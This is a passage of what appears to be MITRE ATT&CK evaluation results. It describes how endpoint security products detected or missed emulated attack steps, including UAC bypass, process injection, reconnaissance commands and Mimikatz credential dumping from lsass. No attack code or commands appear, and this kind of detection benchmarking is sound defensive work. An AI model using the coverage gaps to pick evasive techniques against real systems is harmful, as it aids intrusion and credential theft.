Telemetry showed cmd.exe executing reg.exe with command-line arguments. The telemetry was tainted by the parent Script File Created alert. [1] [2] [3] [4] [5]
McAfee
Enrichment
The capability enriched reg.exe with the correct ATT&CK Tactic (Discovery) and Technique (Query Registry) and a suspicious indicator that the Registry was queried via execution of the reg.exe utility. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Enrichment
The capability enriched reg.exe with the correct ATT&CK Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. Though not visible in the image, MITRE confirmed that the relevant command was visible within the trace detection's process tree. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of cmd.exe running reg.exe with command-line arguments (tainted by the alert on suspicious sequence of exploration activities from child processes of rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Enrichment
The capability enriched reg.exe executing with the correct ATT&CK Technique (Query Registry). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
RSA
Telemetry
Telemetry showed cmd.exe executing reg.exe with command-line arguments. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
Telemetry
Telemetry showed an integrity level change for user Debbie from 8192 (0x2000/Medium) to 12288 (0x3000/High), which is indicative of bypassing UAC. [1] [2] [3] [4]
Cybereason
Telemetry (Tainted)
Telemetry showed powershell.exe running as medium integrity as user Debbie then another instance running later as high integrity as user Debbie. The telemetry is tainted by a parent PowerShell alert. [1] [2] [3] [4] [5]
Endgame
Telemetry
Telemetry showed a mismatch between the logon id (authentication id) of parent and child processes indicating that a different token was used. Though no screenshot for this data is available, this information can be used to trace back to the logon event for that logon id to display the process integrity level indicative of the elevated token used for bypass UAC. During the evaluation, Windows Defender was unknowingly reenabled. As a result, Bypass UAC was tested in a slightly modified method. The detection method Endgame exhibited would have been valid regardless. [1] [2] [3]
FireEye
Telemetry (Configuration Change)
Telemetry showed execution of powershell.exe as a high integrity process as SYSTEM with a token login ID previously associated with user Debbie. A Configuration Change was made in order to collect Windows Event Logs for events 4627 (Group Membership Information) and 4673 (A privileged service was called). [1] [2] [3] [4]
F-Secure
Enrichment
The capability enriched an unelevated svchost.exe spawning an elevated powershell.exe process with a tag indicating a possible UAC Bypass. [1] [2] [3]
GoSecure
None
No detection capability demonstrated for this procedure, though an alert was triggered due to svchost.exe creating the process powershell.exe. [1] [2] [3]
McAfee
Specific Behavior
A Specific Behavior alert was generated for a possible UAC bypass. The alert was tagged with the correct ATT&CK Technique (Bypass User Account Control) and Tactics (Defense Evasion, Privilege Escalation). [1] [2] [3]
Microsoft
Telemetry (Tainted)
Telemetry showed rundll32.exe as a medium integrity process as user Debbie and subsequent execution of powershell.exe as a high integrity process as SYSTEM as part of the UAC bypass (tainted by alert on a suspicious PowerShell command-line generated for the svchost.exe invocation of powershell.exe with an encoded script). [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry
Telemetry showed a process integrity level change from parent rundll32.exe (medium / 8192) to child powershell.exe (high / 12288), both running as user Debbie. [1] [2] [3] [4]
RSA
None
No detection capability demonstrated for this procedure, though an alert was created for PowerShell with the -enc command-line argument. [1]
SentinelOne
Telemetry
Telemetry showed process integrity levels changing from medium to high. Detect was verified, but a screenshot for this data was unavailable. Integrity level values are based upon how the capability tracks integrity levels and not how Windows tracks them causing a difference in values. [1]
Carbon Black
Telemetry
Telemetry showed svchost.exe, with the seclogon command-line argument, performing activity related to token manipulation. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1]
Cybereason
None
No detection capability demonstrated for this procedure, though an alert was generated for malicious code injection into PowerShell. Telemetry also showed that bypassuactoken.x64.dll was loaded. [1] [2] [3]
Endgame
Telemetry
Telemetry showed a svchost.exe seclogon event for a token logon id (authentication id) later used by a new powershell.exe process, highlighting token manipulation via a mismatch in ids between parent and child process tokens. During the evaluation, Windows Defender was unknowingly reenabled. As a result, Bypass UAC was tested in a slightly modified method. The detection method Endgame exhibited would have been valid regardless. [1] [2] [3] [4]
FireEye
Telemetry (Configuration Change)
Telemetry showed a svchost.exe seclogon event for a token logon ID later used by a process whose group membership indicated high integrity. A Configuration Change was made in order to collect Windows Event Logs for events 4627 (Group Membership Information) and 4673 (A privileged service was called). [1] [2] [3] [4]
F-Secure
Telemetry
Telemetry showed svchost.exe executed with the seclogon command-line argument and a subsequent logon event for user Debbie with an elevated token, indicating token manipulation. [1] [2] [3]
GoSecure
None
No detection capability demonstrated for this procedure, though an alert was triggered due to svchost.exe creating the process powershell.exe. [1] [2]
McAfee
Telemetry (Delayed)
Telemetry showed svchost.exe, with the seclogon command-line argument as well as a New Credentials logon event for user Debbie, indicating token manipulation. [1] [2] [3]
Microsoft
Telemetry (Tainted)
Telemetry showed svchost.exe executed with the seclogon command-line argument and a subsequent elevated powershell.exe process, indicating token manipulation (tainted by parent alert on a suspicious PowerShell command-line generated for the svchost.exe invocation of powershell.exe with an encoded script). [1] [2] [3] [4] [5]
Palo Alto Networks
Telemetry
Telemetry showed svchost.exe executed with the seclogon command-line argument and a subsequent logon event with an elevated token and new logon ID, indicating token manipulation. [1] [2] [3]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Endgame
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
GoSecure
None
No detection capability demonstrated for this procedure. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the execution of a specific API call as process enumeration and suspicious activity. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3]
Carbon Black
Specific Behavior
A Specific Behavior alert was generated that was mapped to correct ATT&CK Technique (Process Injection). [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed "crossproc" events indicative of Process Injection into cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
General Behavior (Delayed, Tainted)
OverWatch also generated a General Behavior alert identifying the injection as suspicious. The process tree view showed the alert as tainted by previous svchost.exe and powershell.exe detections. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5]
Specific Behavior (Tainted)
A Specific Behavior alert was generated showing that PowerShell created a thread into a remote process. The alert identified the correct ATT&CK Technique (Process Injection) and Tactic (Defense Evasion). The process tree view showed the alert as tainted by parent svchost.exe and powershell.exe detections. [1] [2] [3] [4] [5]
Telemetry
Telemetry associated with the alert would show thread creation in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3] [4] [5]
Cybereason
Specific Behavior (Tainted)
A Specific Behavior alert was generated for process injection from powershell.exe into cmd.exe (Anonymous RWX). The alert is tagged with the correct ATT&CK Tactic (Defense Evasion) and Technique (Process Injection). The alert is tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Specific Behavior
A Specific Behavior alert was generated for process injection into cmd.exe. [1] [2] [3] [4] [5]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified a process injection from PowerShell.exe to cmd.exe. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. The vendor stated the process injection detection capability is a HX plugin that is only available within the Managed Defense Service, and the data is reported to a separate cloud server which is not accessible to customers at this time. [1] [2]
F-Secure
Specific Behavior
A Specific Behavior alert was generated for PowerShell opening a handle to a system process with access rights typical for a known PowerShell injection pattern, identified as a sign of code injection. [1] [2]
GoSecure
Specific Behavior (Tainted)
A Specific Behavior alert was generated based on DLL injection for powershell.exe injecting into cmd.exe. The detection was labeled with Process Hijacking and Privilege Escalation and tainted by the parent "Powershell process created" alert. The vendor noted all DLL injection conditions are labeled with Privilege Escalation. The vendor also noted Privilege Escalation is one of ten "Capabilities" that are part of the taxonomy. [1] [2] [3] [4] [5] [6] [7] [8]
McAfee
Specific Behavior
A Specific Behavior alert was generated for a process injection from PowerShell into cmd.exe based on both connecting to a named pipe. The alert was tagged with the correct ATT&CK Technique (Process Injection) and Tactics (Defense Evasion, Privilege Escalation). [1] [2] [3]
Microsoft
Specific Behavior (Delayed)
A Specific Behavior alert was generated for process injection. Process Injection attempt was audited by Exploit Guard. Vendor states that the Exploit Guard audit events demonstrate that execution would have been prevented if Export Address Table (EAF) was enabled in blocking mode. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment (Tainted)
The capability enriched data showing powershell.exe injecting into cmd.exe (tainted by alert on a suspicious PowerShell command-line generated for the svchost.exe invocation of powershell.exe with an encoded script). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Palo Alto Networks
Specific Behavior (Tainted)
A Specific Behavior alert was generated for PowerShell injecting shellcode. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3] [4]
RSA
Telemetry
Telemetry showed powershell.exe creating a remote thread into cmd.exe. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe allocating memory, writing to memory space, and invoking a thread into cmd.exe (tainted by association with parent alert for powershell.exe process executed by svchost.exe). [1] [2] [3]
Carbon Black
Enrichment
The capability enriched net.exe with a related ATT&CK technique (Account Discovery). [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability showed net.exe executing with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry within the enrichment showed net.exe executing with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
OverWatch also generated a General Behavior alert identifying cmd.exe executing net as suspicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for net.exe executing as part of a suspicious execution chain related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry
Telemetry showed the process creation of net group with command-line arguments. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
Enrichment (Delayed)
The capability enriched the net command with a related ATT&CK Technique (T1069 - Permission Groups Discovery) and the correct Tactic (Discovery). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1069 - Permission Groups Discovery) and the correct Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it indicated net group was one of the reconnaissance commands performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
F-Secure
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched net.exe indicating that it was run with commands commonly used for reconnaissance. [1] [2] [3] [4] [5] [6]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with the condition Net Group Reconnaissance Command. The enrichment was tainted by the parent \"Powershell Execution Policy ByPass command ran\" alert. At least one condition was added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. [1] [2] [3]
McAfee
Enrichment
The capability enriched net.exe with the correct Tactic (Discovery) and Technique (Remote System Discovery) and a suspicious indicator that the net utility obtained information about domain computers and controllers. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4] [5] [6]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of cmd.exe executing net.exe with command-line arguments (tainted by the alert on suspicious process injection alert association with rundll32.exe). [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched the execution of net.exe as the execution of an enumeration command. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched the execution of net.exe as the execution of an enumeration command using net or net1. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched cmd.exe executing net with a related ATT&CK Technique (System Network Connections Discovery). [1] [2] [3] [4] [5] [6] [7] [8]
RSA
Telemetry
Telemetry showed cmd.exe running net.exe with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by activity seen during the privilege escalation step because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched net.exe with a related ATT&CK technique (Account Discovery). [1] [2] [3] [4] [5] [6]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry within the enrichment showed net.exe with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability showed net.exe executing with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The OverWatch team identified net group as suspicious with a General Behavior alert. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for net.exe executing as part of a suspicious execution chain related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Remote System Discovery). The alert was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry
Telemetry showed the process creation of net group with command-line arguments. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
Enrichment (Delayed)
The capability enriched the net command with a related ATT&CK Technique (T1069 - Permission Groups Discovery) and the correct Tactic (Discovery). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it indicated net group was one of the reconnaissance commands performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1069 - Permission Groups Discovery) and the correct Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8]
F-Secure
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched net.exe indicating that it was run with commands commonly used for reconnaissance. [1] [2] [3] [4] [5] [6]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with the condition Net Group Reconnaissance Command. The enrichment was tainted by the parent "Powershell Execution Policy ByPass command ran" alert. The condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See Configuration page for details. [1] [2] [3]
McAfee
Enrichment
The capability enriched net.exe with the correct Tactic (Discovery) and Technique (Remote System Discovery) and a suspicious indicator that the net utility obtained information about domain computers and controllers. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4] [5] [6]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of cmd.exe executing net.exe with command-line arguments (tainted by the alert on suspicious process injection alert association with rundll32.exe). [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched the execution of net.exe as the execution of an enumeration command using net or net1. [1] [2] [3] [4] [5] [6] [7] [8]
RSA
Telemetry
Telemetry showed cmd.exe running net.exe with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by activity seen during the privilege escalation step because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Enrichment
The capability enriched netsh.exe with a related ATT&CK technique (T1063 - Security Software Discovery) and a tag for Potential Windows Firewall Rule Recon. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry
Telemetry within the process tree showed cmd.exe executing netsh.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because netsh was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry within the OverWatch alert showed netsh executing with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating the execution of netsh by cmd.exe was suspicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment (Tainted)
The capability enriched netsh.exe executing with the correct ATT&CK Tactic (Discovery) and a related Technique (Security Software Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry
Telemetry showed the process creation of netsh with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that netsh was a reconnaissance command used to obtain network configuration and the configuration profile of the Windows Firewall. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Enrichment
The capability enriched netsh.exe with an alert for Netsh Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1063 - Security Software Discovery) and the correct Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
F-Secure
Telemetry
Telemetry showed cmd.exe executing netsh.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing netsh.exe with command-line arguments. The telemetry was tainted by the parent "Powershell Execution Policy ByPass command ran" alert. [1] [2] [3] [4] [5]
McAfee
Enrichment
The capability enriched netsh.exe with the correct Tactic (Discovery) and Technique (System Network Configuration Discovery) and a suspicious indicator that the netsh utility manipulated firewall rules. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed cmd.exe executing netsh.exe with command-line arguments. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of cmd.exe executing netsh.exe with command-line arguments (tainted by the alert on suspicious process injection alert association with rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Telemetry
Telemetry showed cmd.exe executing netsh with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment
The capability enriched netsh.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed cmd.exe running netsh.exe with command-line arguments. [1] [2] [3] [4] [5]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing netsh.exe with command-line arguments. The telemetry was tainted by activity seen during the privilege escalation step because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Carbon Black
Enrichment
The capability enriched netstat.exe with the correct ATT&CK technique (System Network Connections Discovery). [1] [2] [3] [4] [5] [6] [7]
Telemetry
Telemetry within the process tree showed cmd.exe executing netstat.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because netstat was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
Telemetry
Telemetry within the OverWatch alert showed cmd.exe executing netstat with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating cmd.exe executing netstat with command-line arguments was suspicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7]
Cybereason
Telemetry
Telemetry showed cmd.exe executing netstat with command-line arguments. [1] [2] [3] [4] [5] [6]
Enrichment (Tainted)
The capability enriched netstat.exe executing as Reconnaissance and mapped to the correct ATT&CK Technique (System Network Connections Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6]
Endgame
Telemetry
Telemetry showed the process creation of netstat with command-line arguments. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment (Delayed)
The capability enriched the netstat command with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and  Tactic (Discovery). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that netstat was a reconnaissance command used to enumerate active and listening network ports. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched netstat.exe with an alert for Netstat Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
F-Secure
Enrichment
The capability enriched netstat.exe with a tag identifying the command as enumeration. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing netstat.exe with command-line arguments. The telemetry was tainted by the parent "Powershell Execution Policy ByPass command ran" alert. [1] [2] [3]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing netstat.exe with command-line arguments. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched netstat.exe with the correct Tactic (Discovery) and Technique (System Network Connections Discovery) and a suspicious indicator that network statistics and TCP/IP connections were gathered. [1] [2] [3] [4] [5] [6]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of cmd.exe executing netstat.exe with command-line arguments (tainted by the alert on suspicious process injection alert association with rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Palo Alto Networks
Telemetry
Telemetry showed cmd.exe executing netsh with command-line arguments. [1] [2] [3] [4] [5]
Enrichment
The capability enriched netstat.exe executing with the correct ATT&CK Technique (System Network Connections Discovery). [1] [2] [3] [4] [5]
RSA
Telemetry
Telemetry showed cmd.exe running netstat.exe with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing netstat.exe with command-line arguments. The telemetry was tainted by activity seen during the privilege escalation step because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Specific Behavior
A Specific Behavior alert was generated showing the correct ATT&CK Technique (Credential Dumping). [1] [2] [3]
Telemetry
Telemetry showed an open handle to a thread into lsass.exe, which is indicative of process injection for credential dumping. [1] [2] [3]
CrowdStrike
Telemetry
Telemetry showing the lsass handle open and DLL loading would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for Credential Dumping, which indicated "a DLL was detected as being reflectively loaded in the callstack." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection. [1] [2] [3]
General Behavior (Delayed, Tainted)
A General Behavior alert was generated by the OverWatch team indicating the Credential Dumping activity was suspicious. The process tree view showed the alert as tainted by a parent detection. OverWatch is the managed threat hunting service. [1] [2] [3]
Cybereason
Specific Behavior
A Specific Behavior alert was generated for svchost.exe loading Mimikatz and accessing lsass (an audited system resource). The alert was also tagged with the correct ATT&CK Tactic (Credential Access) and related Technique (Process Injection). [1] [2] [3] [4]
Endgame
Specific Behavior
A Specific Behavior alert was generated for the correct ATT&CK Technique (Credential Dumping). [1] [2]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
None
No detection capability demonstrated for this procedure. [1]
GoSecure
None
No detection capability demonstrated for this procedure, though a DDNA Scan alerted for svchost.exe and displayed details related to Project Injection. According to the vendor, DDNA scans trigger due to machine learning scanning in-memory code and identifying that the code is malicious. DDNA output, which is delayed, shows the process capabilities (known as "traits"), which may give an analyst clues on what the process does. [1] [2] [3] [4]
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
Enrichment (Tainted)
The capability enriched data showing a svchost.exe process opening lsass.exe with a description that it was accessing credentials (tainted by parent process injection event that occurred from svchost.exe). Exploit Guard audited the process open and credential extraction event. Vendor stated the Exploit Guard audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode. Vendor stated that Credential Guard can also mitigate this attack if enabled. [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
A Specific Behavior alert was generated on credential memory access. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Specific Behavior
A Specific Behavior alert was generated for a suspicious handle being opened to lsass.exe to dump passwords. The alert was tagged with the correct ATT&CK Technique (Credential Dumping). Vendor stated the capability would have prevented this behavior. [1] [2] [3]
RSA
